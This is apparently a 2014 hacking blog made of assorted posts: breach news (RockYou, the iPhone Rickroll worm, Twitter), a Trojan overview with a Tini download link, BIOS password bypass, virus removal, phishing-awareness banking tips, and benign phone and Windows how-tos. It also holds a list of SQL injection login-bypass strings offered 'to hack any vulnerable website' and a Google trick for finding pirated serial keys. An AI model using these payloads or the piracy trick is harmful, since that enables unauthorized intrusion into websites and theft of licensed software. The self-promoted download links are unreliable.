Expert Hacker:-Bishal obory

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Friday, August 8, 2014

RockYou Hacked – 32 Million Account Passwords Latest News


               RockYou Hacked – 32 Million Account Passwords Latest News

RockYou has suffered a serious hacker attack that has exposed 32 million of its customer usernames and passwords to possible identity theft. And it has apparently taken RockYou more than 10 days to inform its users of the breach. The security firm Imperva informed RockYou that its site had a serious SQL injection flaw, according to reports. Imperva said that some userse passwords had already been compromised as a result of the vulnerability by the time it notified RockYou of its findings. RockYou acted quickly to fix the flaw, but perhaps not fast enough. One hacker claimed to have gotten access to the accounts and posted some data as proof. Apparently, the database included the full list of unencrypted passwords in plain text. The flaw is a big one because RockYou usernames and passwords are, by default, the same as userse email names and passwords. Security experts are advising RockYou users to change their emails and passwords. RockYou has some of the most popular apps on Facebook, and it ranks third among Facebook developers with 55 million monthly active users, according to AppData. SQL injection exploits a vulnerability in an appes database layer and is a very common attack. It potentially lets hackers steal private information, and Yahooes jobs site recently suffered a similar attack. Imperva chief technology officer Amichai Shulman told eWeek Europe that users are particularly vulnerable if they use the same usernames and passwords for all of the sites that they visit. In a statement to Techcrunch, RockYou said, "On December 4, RockYoues IT team was alerted that the user database on RockYou.com had been compromised, potentially revealing some personal identification data for approximately 30M registered users on RockYou.com. RockYou immediately brought down the site
and kept it down until a security patch was in place. RockYou confirms that no application accounts on Facebook were impacted by this hack and that most of the accounts affected were for earlier applications (including slideshow, glitter text, fun notes) that are no longer formally supported by the company. RockYou has secured the site and is in the process of informing all registered users that the hack took place.. RockYou said it is planning to notify users. As others have noted, 10 days after it learned of the breach is far too late.

Thursday, August 7, 2014

What is Trojan horse


What is Trojan Horse
 Working of Trojan Horse
 Types of Trojan Horse
 How They Introduced
 Tini Trojan
Classic Netbus
Beast RAT 2.07


*What is Trojan horse
    Trojan horse, or Trojan, is software that appears to perform a desirable function for the user prior to run or install, but (perhaps in addition to the expected function) steals information or harms the system.


*Working of Trojan
Attacker gets access to the infected(server) system as the system goes online.
Through the access given by the Trojan, an attacker can stage attacks of  different types.

*Types of Trojan Horse
1.Password Sending/ capturing
2.FTP Trojans
3.Key stroke captures
4.Denial Of Service (DoS)
5.Remote Access
6.Software Detection Killers

*How they introduced
1.Chat Clients ( Yahoo, Gtalk, IRC)
2. Email Attachments
3. Physical Access to the System
4. P2P (Torrent) and Freeware Sites
5. Wrappers
6. File Sharing


*Tini
Tini Trojan found at
 http://ntsecurity.nu/toolbox/tini

The Small 3kb size of this file left a small signature , hence the name Tini.

It only listen on port 7777 and returns a command prompt shell to the attacker. The static use of this port made easy to detect.

From a Tini client you can telnet to Tini server at port 7777 .

*Net bus
Netbus is a software program for remotely controlling a Microsoft Windows computer system over a network. It was created in 1998 and has been very controversial for its potential of being used as a backdoor.


*Beast Final V.2.7
Beast is a Windows-based backdoor Trojan horse more commonly known in the underground "script- kiddie" community as a RAT (Remote Administration Tool). It is capable of infecting almost all Windows versions i.e. 95 through XP. Written in Delphi and released first by its author Tataye in 2002, it became quite popular due to its unique features.



How To Reset Your Lost Bios Password


How To Reset Your Lost Bios Password

Bios password are used to secure your desktop and latop computer by preventing user from changing your bios setting or acessing to your computer while u are away.there is too type of password protection the first one is bios setup protection:to prevent user from changing bios setting thesecond one system proetction:to make the system unbootable intel entring the password. but sometime user can forget their password or even wrose they can get infected by bios Backdoor verus.so sending back the unit for reset bios is expensive here is some why how to recover or remove u lost bios password U can start first by mailing your Before hardware manufacturer support before attempting to bypass the BIOS password on a computer or laptop, then ask them if there is some bypass security.in the worest case u will not get any answer so here is the type oto follow
1) u can start by using a manufacturers backdoor password to access the BIOS
2) there is large range of password cracking software can be also used
3)on of the most efficase way is to reset the bios cmos .just look to the motherboard somewhere near your battery thir should be a jumper placed in two pin.if there is no third pin just take out the jumper then place it back .if there is a thrid jumper just place it in 2-3 possition then back to normal possition .dont forget to fully switch off your pc or laptop.u

can risk of riuning your motherboard if u clear the cmos with powered up motherboard .
4)the second way how to get the bios to default value is by removing the battery .just remove it for 30 min the put it back .again u must fully unplug any power cable during the process
by Overloading the keyboard buffer.not always working but should help in some case
The last way is toUse a professional service


World‟s First iPhone Worm Hits iPhone Owners In Australia


Worlds First iPhone Worm Hits iPhone Owners In Australia

Apple iPhone owners in Australia have reported that their smartphones have been infected by a worm that has changed their wallpaper to an image of 1980s pop crooner Rick Astley. Tricking victims in to inadvertently playing the song has become a popular prank known as Rickrolling.
The attacks, which researchers say are the world‘s first iPhone worm in the wild, target jailbroken iPhones that have SSH software installed and keep Apple‘s default root password of 

"alpine. In addition to showing a well-coiffed picture of Astley, the new wallpaper displays the message "ikee is never going to give you up, a play on Astley‘s saccharine addled 1987 hit "Never Gonna Give You Up.
A review of some of the source code, shows that the malware, once installed, searches the mobile phone network for other vulnerable iPhones and when it finds one, copies itself to them using the the default password and SSH, a Unix application also known as secure shell. People posting to this thread on Australian discussion forum Whirlpool first reported being hit on Friday. "I foolishly had forgot to change my root and user password last time i had jailbroke my phone, wrote one forum participant. In addition to his own iPhone being attacked, he said a flatmate‘s iPhone 3G was also sullied with the image of Astley. Users who tried to delete the image were chagrined to find it reappear once they rebooted their device. The attack is a wakeup call for anyone who takes the time to jailbreak an iPhone. While the hack greatly expands the capabilities of the Apple smartphone, it can also make it more vulnerable. Programs such as OpenSSH, which can only be installed after iPhones have undergone the procedure, can be extremely useful, but if owners haven‘t bothered to change their root password, the programs also represent a gaping hole waiting to be exploited. Indeed, a hacker going by the moniker ikee and claiming to be responsible for the worm said here that he wrote the program to bring awareness to the widely followed practice of failing to change the iPhone‘s password.
"I was quite amazed by the number of people who didn‘t RTFM and change their default passwords, the unidentified worm writer 149
said. "I admit I probably pissed of [sic] a few people, but it was all in good fun (well ok for me anyway). Ikee said the worm disables the SSH daemon so it can‘t be targeted further. So far, there are no reports of people outside of Australia getting infected. And the attack appears to do nothing more than Rickroll victims with the Astley wallpaper. But because the writer released source code for four separate variants, it wouldn‘t be surprising for copycats in other regions to appropriate the attack code and potentially imbue it with more malicious payloads. Source:- The Register

Latest Hacking News Articles


Latest Hacking News Articles
Obama's and Fox News Twitter accounts Hacked By 18 year old.


n 18-year-old hacker with a history of celebrity pranks has admitted to Monday’s hijacking of multiple high-profile Twitter accounts, including President-Elect Barack Obama’s, and the official feed for Fox News. The hacker, who goes by the handle GMZ, told Threat Level on Tuesday he gained entry to Twitter’s administrative control panel by pointing an automated password-guesser at a popular user’s account. The user turned out to be a member of Twitter’s support staff, who’d chosen the weak password "happiness." Cracking the site was easy, because Twitter allowed an unlimited number of rapid-fire log-in attempts. "I feel it’s another case of administrators not putting forth effort toward one of the most obvious and overused security flaws," he wrote in an IM interview. "I’m sure they find it difficult to admit it." The hacker identified himself only as an 18-year-old student on the East Coast. He agreed to an interview with Threat Level on Tuesday after other hackers implicated him in the attack. The intrusion began unfolding Sunday night, when GMZ randomly targeted the Twitter account belonging to a woman identified as "Crystal." He found Crystal only because her name had popped up repeatedly as a follower on a number of Twitter feeds. "I thought she was just a really popular member," he said. Using a tool he authored himself, he launched a dictionary attack against the account, automatically trying English words. He let the program run overnight, 145
and when he checked the results Monday morning at around 11:00 a.m. Eastern Time, he found he was in Crystal’s account. That’s when he realized that Crystal was a Twitter staffer, and he now had the ability to access any other Twitter account by simply resetting an account holder’s password through the administrative panel. He also realized he hadn’t used a proxy to hide his IP address, potentially making him traceable. He said he hadn’t used a proxy because he didn’t think the intrusion was important enough to draw law-enforcement attention, and "didn’t think it would make headlines." He said he decided not to use other hacked accounts personally. Instead he posted a message to Digital Gangster, a forum for hackers and former hackers, offering access to any Twitter account by request. "I … threw the hack away by providing DG free accounts," he said. He also posted a video he made of his hack to prove he had administrative access to Twitter. President-Elect Barack Obama was among the most popular requests from Digital Gangster denizens, with around 20 members asking for access to the election campaign account. After resetting the password for the account, he gave the credentials to five people. He also filled requests for access to Britney Spears’ account, as well as the official feeds for Facebook, CBS News, Fox News and the accounts of CNN correspondent Rick Sanchez and Digg founder Kevin Rose. Other targets included additional news outlets and other celebrities. Fox won the hacker popularity contest, beating out even Obama and Spears. According to Twitter, 33 high-profile accounts were compromised in all. GMZ doesn’t know what the reset passwords were, because Twitter resets them randomly with a 12-character string of numbers and letters. On Monday morning, the Twitter accounts belonging to Obama, Britney Spears, FoxNews and others, begansending out bogus messages. Someone used the Obama account to send out a message urging supporters to click on a link to take a survey about the president-elect, and be eligible to win $500 in gasoline. A fake message sent to followers of the Fox News Twitter feed announced that Fox host Bill O’Reilly "is gay," while a message from Britney Spears’ feed made lewd comments about the singer. It was initially believed that the Twitter account hijackings were related to two phishing scams that surfaced over the weekend. But GMZ’s hack was unrelated. Shortly after GMZ posted his original message to Digital Gangster, the site’s administrator deleted it, along with the responses from members asking for access to other accounts. But a subsequent thread on the site supports GMZ’s account of the hack. GMZ said he didn’t access any of the high-profile accounts himself, and didn’t send out any of the bogus tweets. He thinks he was in Twitter a couple of hours before the company became aware of his access and locked him out. 146
Twitter co-founder Biz Stone confirmed for Threat Level that the intruder had used a dictionary attack to gain access to the administrative account, but wouldn’t confirm the name of the employee who was hacked, or the password. He also wouldn’t comment on how long the intruder was in the Twitter account resetting passwords before he was discovered. "Regarding your other questions, I’d feel more comfortable addressing them once we’ve spoken to counsel because this is still ongoing," he wrote Threat Level in an e-mail. Stone said that Twitter has already been contacted by the Barack Obama campaign about the hack and has been in touch with everyone whose account was accessed by the intruders. He said Twitter had not had contact with the FBI or any other law enforcement agency. "We’re waiting to hear back from our lawyer about what our responsibilities are about this and how to approach it," Stone said in a separate phone interview. As for addressing the security issues that allowed the breach, he wrote in a follow-up e-mail that the company is doing "a full security review on all access points to Twitter. More immediately, we’re strengthening the security surrounding sign-in. We’re also further restricting access to the support tools for added security." GMZ, who said he’s been hacking for about three years and is currently studying game development, said he conducted the dictionary attack using a script he wrote and used last November to break into the YouTube account of teen queen Miley Cyrus. That hack gained widespread attention when someone posted a video memorial to Cyrus on the account, claiming Cyrus had died in a car accident. GMZ said a friend of his was responsible for the hoax. GMZ said he’s used the same dictionary attack to breach the SayNow accounts of Disney star Selena Gomez and other celebrities. After YouTube blocked his IP and patched some vulnerabilities he was exploiting, he decided "for the fun of it (curiosity and self-entertainment) I’ll pen-test Twitter." He was "shocked to realize that there was no rate limit" to lock someone out after a specific number of failed password attempts. He said he’d never even heard of Twitter until he saw someone mention it on YouTube. Source:- The Register

How To Download Youtube Videos


How To Download Youtube Videos

Free Web services for downloading videos from video-sharing sites
ClipNabber allows you to download videos from YouTube, Metacafe, etc. by simply copying and pasting the URL. You'll then get a link whereby you can download the file to your computer, iPod, iPhone, or any other media player. You'll need to have an FLV player for the YouTube videos. Quick and very easy to use!

Zamzar is a free online file conversion web application that can not only convert videos off the Internet to AVI, MPEG, 3GP, MP4, MOV, etc., but also converts between audio, image, and document formats. Paste the URL into Step 1 and then convert the file to your favorite format.
Vixy.net is another site that not only downloads online videos, but will also convert them to AVI, MOV, MP4, 3GP, or MP3 (if you want to extract
the audio from the file). Using this site, you don't have to worry about downloading a FLV player as you can convert it to Windows format. (Same as Zamzar)

KeepVid also supports just about any video sharing site out there and the only difference about this site is that it also has a Top Videos section, so you can quickly download the most watched videos around the web.

Media Converter is similar to ZamZar and vixy.net, but requires you to create an account and log in. Also, it seems like it only supports downloading and converting videos from YouTube. You can also download their video download program, but it only supports 5 sites.

Hey! Watch is an online video encoding web service that encodes video into different formats including HD very quickly. The graphical interface is very nice and there are lots of features and options, such as the ability to transfer any video from the web directly to an FTP server or to online storage.

YouTubeX, as the name suggests, allows you to download videos from YouTube. Obviously, it only supports YouTube, but it has a couple of other features, such as the ability to play your video on the site and find popular videos quickly.

VideoRonk searches across multiple video-sharing sites such as Google Video, YouTube, MetaCafe and DailyMotion to find the most popular videos on each of them. You can either watch them on VideoRonk or download them to your computer in FLV format.

VidDownloader supports about 10 sites including the major ones and can download the videos in DivX AVI format. It's very easy to use and can also extract only the audio from a video by choosing "Just Audio" on the download page. You don't have to worry about having an FLV player since it converts the files to Windows format.

According to their web site, they support more than 98 video sites including MySpace, CollegeHumor, iFilm, etc. You'll have to rename the files you download from YouTube with the .FLV extension at the end.

This site is a foreign site, but is easy to use and supports most of the major sites. You can also download a free FLV player off their site to play videos from YouTube.
DownThisVideo has a nice tag cloud at the top that you can click on to find videos quickly. From what I could tell, this site is mostly used by Japanese because the popular videos are mostly Anime, etc. However, you can still use it to download any YouTube video.

Bishal obroy  Suggesion: - If you do not like above then I suggest go for orbit downloader free software for downloading ,it can directly download songs of youtube

Recover Lost Data from The Sim Card


                 Recover Lost Data from The Sim Card
1. Free to download Data Doctor Recovery - Sim Card and install it . Connect your sim card reader on port and insert sim card in it.
2. Click the Data Doctor Recovery - Sim Card desktop icon (or select from the Windows programs list) to launch the product. The initial screen (below) is displayed.

 3. Click on the Read Sim Card Icon. This will display.
4. Select appropriate Com Port, Data Baud and Parity or you can set the default setting. Then click "ok".
After this splash screen move. For Phone Book information Click on the Phone Book icon. Then Click on Contact in Phone Book Tree. This will show as below... For SMS information click on Sms Icon.This will show as below..
To Recover your deleted Sms click on Deleted on Tree. This will display as. You can also see the ASCII or Hex Value of selected phone number or SMS by click on Ascii value and Hex value Tab Button. To Know the ICC Identification and service provider name click on Others Button. These are displayed as.. ICC Identification Service Provider Name

About Sim card data recovery software Sim Card Data Recovery Software recovers your mobile phone sim card accidentally deleted text SMS messages. Data Doctor Sim Card Recovery Software is read only and non-destructive utility restore all lost message. Utility retrieve all deleted contact numbers (phone numbers), unreadable messages, corrupt phone book directory.
Bishal obroys Suggesion: -“Very good free software you can download if from the official doctor data recovery webportal or www.ethicalhacking.do.am”

How To Remove New Folder Virus


How To Remove New Folder Virus
What is Newfolder.exe?
The real name of this virus is Iddono. This threat copies its file(s) to your hard disk. Its typical file name is Iddono. Then it creates new startup key with name Iddono and value newfolder.exe. You can also find it in your processes list with name newfolder.exe or Iddono. This virus is very difficult to eliminate manually, but you can find several possible methods of removal below.
How to fix Newfolder.exe?
Quick Solution:
True Sword will find and eliminate this problem and more than 447 908 other dangerous threats including trojans, spyware, adware, riskware, problemware, keyloggers, dialers and other kinds of malicious programs in several seconds. Fast, easy, and handy, True Sword protects your computer against malicious programs that do harm to your computer and break your privacy. True Sword scans your hard disks and registry and destroys any manifestation of such malicious programs. Standard anti-virus software can do nothing against privacy breakers and malicious programs like that. Get rid of trojans, spyware, adware, trackware, dialers and keyloggers in one click now! Download True Sword from www.ethicalhacking.do.am for free.
How to fix Newfolder.exe manually? For advanced users only
This problem can be solved manually by deleting all registry keys and files connected with this software, removing it from starup list and unregistering all corresponding DLLs. Additionally missing 135
DLL's should be restored from distribution in case they are corrupted by Iddono. To fix this threat, you should: 1. Kill the following processes and delete the appropriate files:
Ø libedit.dll
Ø newfolder.exe
Ø shelliddono.dll
Ø srv0104.ids
Ø srvidd20.exe

If these files can't be deleted during normal Windows work or recreate themselves, reboot into Safe Mode and repeat deletion. If you do not see all of these files, then they are hiding themselves. You need special software to kill those hidden files. 2. Delete the following malicious registry entries and\or values:
Ø Key: SOFTWARE\Microsoft\Windows\CurrentVersion\Run for nwiz.exe Value: @
Ø Key: software\microsoft\windows\currentversion\run\alchem Value: @
Ø Key: software\microsoft\windows\currentversion\run\zzb Value: @

Another method which is recently discovered by me that any AVG antivirus above 8.0version can detect the new folder virus easily. 
Bishal obroy s Suggesion: -“ For beginners I recommend to for the Software True Sword its free from www.ethicalhacking.do.am”

All SQL Injection Strings


All SQL Injection Strings(Education Purpose Only)
These strings can be used to hack any vulnerable website having SQL at backhand.
Admin--
' or 0=0 --
" or 0=0 --
 or 0=0 --
 ' or 0=0 #
 " or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
 ') or('x'='x
' or 1=1--
" or 1=1--
 or 1=1--
' or a=a--
 ' or 'a'='a
 " or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
 hi" or 1=1 --
 hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
 hi") or ("a"="a
 Here are the strings through any vulnerable site can be hacked.
Bishal obroy s Suggesion: -“As I said this is just for education purpose only. Do not try it to break law in your country”

Get Orkut Scraps Through SMS


Get Orkut Scraps Through SMS
If you are thinking about, who written what in your Orkut Scrap Book and if you don‘t have access of Internet, this problem can be solved by getting all new Orkut Scraps in your mobile directly.
To get Orkut Scraps in your mobile through SMS you need to do following things
Step 1. Join mobee.in , and submit your mobile number. By joining mobee.in you will get an email ID something like this <your mobile number>@mobee.in. Any email received at this email ID will be forwarded to you mobile number through SMS (10 email per day free). STEP 2. Change setting to your Orkut account by which you will get copy of all scraps in your GMAIL (mail account) also.
STEP 3. Open the gmail and set an option to filter and forward your orkutscrap to your mobee.in emailID. Choose filter word ―orkut . If you do it, a copy of filtered mail (orkut related) will be sent to your mobee.in mail ID automatically.
 STEP 4. mobee.in will forward (after receiving) this scrap to your mobile phone through SMS. Now read the scraps in your mobile.
 Whenever anyone write scrap in your orkut scrap book, a copy of scrap will be received on your GMAIL. Gmail forward a copy of scrap on your mobee.in email ID, mobee.in will forward this scrap to your mobile phone through SMS. All process will take place without any time delay.

Delete an Undeletable File In Windows


Delete an Undeletable File In Windows


In Windows XP, there are a couple ways to remove an undeletable file, a manual way, and a couple automated ways using some freeware programs. First, I'll show you the manual way. If you already know the path to the file, please skip to Step 7
 1. Click on Start, Search, All Files and Folders
2. Type the name of the undeletable file in the box shown
 3. Make sure the Look In box shows the correct drive letter
4. Click Search and let the computer find the file
 5. Once the file is located, right-click on it and choose properties, make a note of the file location. Usually this is something similar to c:\windows\system32\undeleteablefilesname.exe
6. Close the search box
7. Click on Start, Run, and type CMD and Press Enter to open a Command Prompt window
8. Leave the Command Prompt window open, but proceed to close all other open programs
9. Click on Start, Run and type TASKMGR.EXE and press Enter to start Task Manager
10. Click on the Processes tab, click on the process named Explorer.exe and click on End Process.
11. Minimize Task Manager but leave it open
12. Go back to the Command Prompt window and change to the directory where the file is located. To do this, use the CD command. You can follow the example below. Example: to change to the Windows\System32 directory you would enter the following command and Press Enter cd \windows\system32
13. Now use the DEL command to delete the offending file. Type DEL <filename> where <filename> is the file you wish to delete. Example: del undeletable.exe
14. Use ALT-TAB to go back to Task Manager
15. In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.
16. Close Task Manager
 Bishal obroys Suggesion :-“If you dont want to do this manually then I recommend you to go for software called “Pocket Kill Box” It can delete all files which you want but do not delete your system files”

To install Windows Server 2003



To install Windows Server 2003


1. Insert the Microsoft Windows Server 2003, Enterprise Edition CD-ROM into the CD-ROM drive.
2. On the Welcome to Microsoft Windows Server 2003 screen, select Install Windows Server 2003, Enterprise Edition.
3. On the Welcome to Windows Setup page on the Windows Setup dialog box, select New Installation in the Installation Type list, and then click Next.
4. On the License Agreement page on the Windows Setup dialog box, read the license agreement. To proceed, you must select I Accept This Agreement. Click Next.
5. On the Your Product Key page, type the product key that appears on the sticker attached to the installation CD-ROM case, and then press Next.
6. On the Setup Options page, select the appropriate setup options for your organization, and then click Next.
7. On the Upgrade To The Windows NTFS File System page, select the appropriate file system for your setup, and then click Next.
8. On the Get Updated Setup Files, select No, Skip This Step and Continue Installing Windows, and then click Next. The installation procedure copies setup files and restarts your computer in text mode.
9. On the Setup Notification screen, press Enter.
10. On the Welcome to Setup screen, press Enter. Setup searches for previously-installed versions of Windows.
11. A new screen appears if Setup finds previously installed versions of Windows. Press ESC to continue.
12. On the next screen, select the partition on which you want to install Windows Server 2003, Enterprise Edition, press Enter, and then press C to continue Setup using the selected partition. Or, to create a new partition in unpartitioned space, just press C. Then you can install Windows Server 2003, Enterprise Edition, in the newly partitioned space. Specify the size of the partition (at least 2 GB is recommended) and press Enter to continue. Be sure to format the partition as NTFS.
13. Setup examines your disks, copies additional files, and then restarts your computer.
14. Setup installs Windows files and displays messages about the benefits of using Windows Server 2003. On the Regional and Language Options page, select the appropriate settings for your organization, and then click Next.
15. On the Personalize Your Software page, type your name in the Name box and your organization name in the Organization box, and then press Next.
16. On the Licensing Modes page, click Next.
17. On the Computer Name And Administrator Password page, type SERVER1 in the Computer Name box. (Type SERVER2 in the Computer Name box if you are installing Windows Server 2003 Enterprise Edition on your second computer.) Then type a password in the Administrator Password and Confirm Password boxes. Click Next.
18. On the Modem Dialing Information page, enter the appropriate information about your modem, and then click Next.
19. On the Date And Time Settings page, enter the appropriate information about the date and time and your time zone, and then click Next.
20. Setup installs Windows files and displays messages about the benefits of using Windows Server 2003. On the Networking Settings page, ensure that Typical Settings is selected and then click Next.
21. On the Workgroup Or Computer Domain page, ensure that No, This Computer Is Not On a Network Or Is On A Network Without A Domain is selected and that the workgroup name is WORKGROUP, and then click Next.
22. Setup installs Windows files, displays messages about the benefits of using Windows Server 2003, and then restarts your computer. The newly installed version of Windows Server 2003, Enterprise Edition is now running.
23. Remove the Windows Server 2003 installation CD-ROM from the CD-ROM drive.

Reasons Why Pc Crashes


                  Reasons Why Pc Crashes
1. Hardware conflict The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device. For example a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.
 2. Bad Ram Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing. But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run the entire Ram at the slower speed. This will often crash the machine if the Ram is overworked.
3. BIOS settings Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.
Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.
4 .Hard disk drives After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze.
5. Fatal OE exceptions and VXD errors Fatal OE exception errors and VXD errors are often caused by video card problems. These can often be resolved easily by reducing the resolution of the video display.
6. Viruses Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk.
7. Printers The action of sending a document to print creates a bigger file, often called a postscript file. Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.
8. Software A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.
9. Overheating Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to. One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com
10. Power supply problems With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.
Bishal obroys Suggestion: -“ Over 80% computer crashesout of 100% due to bad power supply so it is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost”

GPRS Settings For All Mobile Networks


GPRS Settings For All Mobile Networks

Get free GPRS settings for any operator/mobile in world on Your Mobile Phone: Free GPRS settings: Most of people have face problems regarding gprs settings on their mobile phones. I have been getting lots of mails about how to configure and where to get gprs setting, So here are most of gprs settings for most of mobile service operator (India). Here you have manual gprs settings for vodafone, hutch,idea, airtel, bsnl, airtel live, airtel mobile you can enter in your phone and configure.
Reliance Smart GPRS Settings:
 Settings for SMARTWAP:
* Account name : SMARTWAP
* Access point name: SMARTWAP
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080 Settings for SMATRNET:
* Account name: SMARTNET
 * Access point name: SMARTNET
 * Home page: http://www.google.co.in
* Wapgateway proxy IP address: 97.253.29.199
 * Port: 8080 Settings for MMS:
* Account name: RTLMMS * Access point name:MMS * Homepage: http://10.114.0.5/mms/ * Wapgateway IP: 10.114.0.13 * Port: 9401
Idea gprs Settings:
Account Name – idea_GPRS Username – leave Blank Password – leave Blank Homepage – http://wap.ideafresh.com Proxy and Server Port – 8080 Proxy and Server adress – 010.004.042.045 Databearer – GPRS / Packetdata Acces Point Name – imis Proxy – Enabled/yes Authentication Type – Normal
Hutch or Vodafone Essar gprs Settings: Account Name – Vodafone Live User Name – leave Blank Password – leave Blank Proxy – Enabled/yes Access Point Name – portalnmms
Proxy – Enabled/yes. Proxy and Server address – 010.010.001.100 Proxy and Server Port – 9401 or 8080
Homepage – http://live.vodafone.in Authentication Type – Normal
Airtel gprs Settings
Account Name – Airtel_gprs User Name – leave Blank Password – leave Blank Homepage – http://live.airtelworld.com Proxy – Enabled/yes. Proxy and Server Adress – 202.56.231.117 Proxy and Server Port – 8080 Data bearer – GPRS or Packet Data. Access Point Name – airtelgprs.com Authentication Type – Normal Use preferred access point – No
Airtel live settings
Account Name – Airtel_live Homepage – http://live.airtelworld.com Username – leave Blank Password – leave Blank Proxy – Enabled/yes Proxy and Server Adress – 100.001.200.099 Accespoint Name – airtelfun.com Proxy and Server Port – 8080 Data bearer – GPRS/ Packet Data Authentication Type – Normal 120
BPL gprs Settings:
Account Name – BPL WAP Username – leave blank Password – leave blank Proxy – Enabled/yes Homepage – http://wap.mizone.bplmobile.com Proxy and Server address – 10.0.0.10 Proxy and Server Port – 8080 Acces Point Name – mizone Data bearer – GPRS/ Packetdata Authentication Type – Normal
BSNL gprs Settings:
Account Name – bsnlwap Username – leave blank Password – leave blank Proxy – Enabled/yes Homepage – http://wap.cellone.in Proxy and Server address – 010.132.194.196 Proxy and Server Port – 8080 Acces Point Name – wapnorth.cellone.in Data bearer – GPRS/ Packetdata Authentication Type – Normal
Bishal obroys Suggesion: -“These settings may vary from city to city so check your area but I recommend to first go for automatic setting from your network provider”

Online Banking Tips From Bishal obroy



Online Banking Tips From Bishal obroy

Online banking is the latest or should say fastest way for banking these days. People go for online banking for money transfer and more other purposes. But as online banking provides us great features for banking in quite simple and fast way but along with that it made very gud chances for hackers to steal money in a many ways. From last 5 years there are enormous cases found of hacking of bank account or money transfer from one country to another by hackers.Today in this article I will give some important tips to how to secure your online banking.
1. Do not login from any other link of bank website from other websites.Always login by entering the official website.Because it is the best method of hacking adopted by hackers. You can image that they can create 100% clone type page similar to the official website of bank.and can hack your acoount no and password.

OK here is an example which will make it clear
Suppose I am a hacker what I do, I hve an website www.bishal.com here I wana hack peoples bank accounts then what I do first ,I will make a clone page of the real bank webpage(the main page of website).Making same page is not a difficult task,just a few week experience and you too can clone Microsoft‘s page(he he he).Ok lets come to work again. After making the clone page of banks like Axis bank (just for example),what I do next I place it on my website by saying that it is the fastest link to your bank. People these days have no patients they will click on that link so that they can enter website more fastly. Here they did the big mistake then the clone page opens and person will think that it is the official
of Bank they enter there password and account no. As they click on LOGIN. What happens the password along with account no goes to hackers email address or in his server address. And as simple hacker hacks the account transfer the money and your like dumbo still watching and sayingHey bhagwan yeh kasie ho gyaa.
2. Always use online virtual keyboard provided by every bank website.What is happening these days hackers got sniffing tools(hacking tools through they hack mostly called keyloggers),with the help they can enter your computer and after entering records every keyboard key pressed by you after a month or a week or a single day.What the entered software do it will send a email automatically to the hacker along with a record of key pressed by you on keyboard. and with this report hacker can know your account no and password. So to restrict this problem banks lunched online keyboard where you can enter your account no and password by clicking mouse character by character.

Bishal obroys Suggestion:-“So with these tips I hope you will be satisfied and this article help you feel safe and more secure than last time you login your bank account. So Have a nice time and happy banking from me.”

How Hacker‘s Hide Files In Jpeg Pics


How Hacker‘s Hide Files In Jpeg Pics

Storm allows you to hide your confidential files and compressed folders in regular JPEG picture files. Your information is encrypted and hidden inside the JPEG file without affecting the picture's appearance, quality or dimensions. Storm is very easy to use and it does not require a password. It is compatible with all modern Windows versions and it is distributed as freeware.
 Requirements: Pentium 166MHZ or better, 64MB RAM or better, 2MB hard disk space minimum
Download this software free from this below link http://www.download3k.com/DownloadLink1-Mindhills-International-Storm.html
Bishal obroys Suggesion:-“ For More information to how to use this software go to www.bishalhackingguru.blogspot.com”

Hack To Find Any Software Serial Key


Hack To Find Any Software Serial Key

Ok, this is a little trick that i usually use to find cd keys with Google. If you‘re looking for a serial number for Nero (for example) go to google.com and type Nero 94FBR and it'll bring it up this works great in Google.
HOW DOES THIS WORK?
 Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.
2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.
Bishal obroys Suggesion: -“I hope this trick help you finding your cd keys easily,you can try more key hacks to see more results. But still I am in favour of Original Software’s buy original and play safe”

Tips From World‘s Top Most Antivirus Compay


Tips From World‘s Top Most Antivirus Compay
Enjoy Nortan‘s Top 10 Computer Security Tips, the following are summaries those generally regarded as the most valuable:
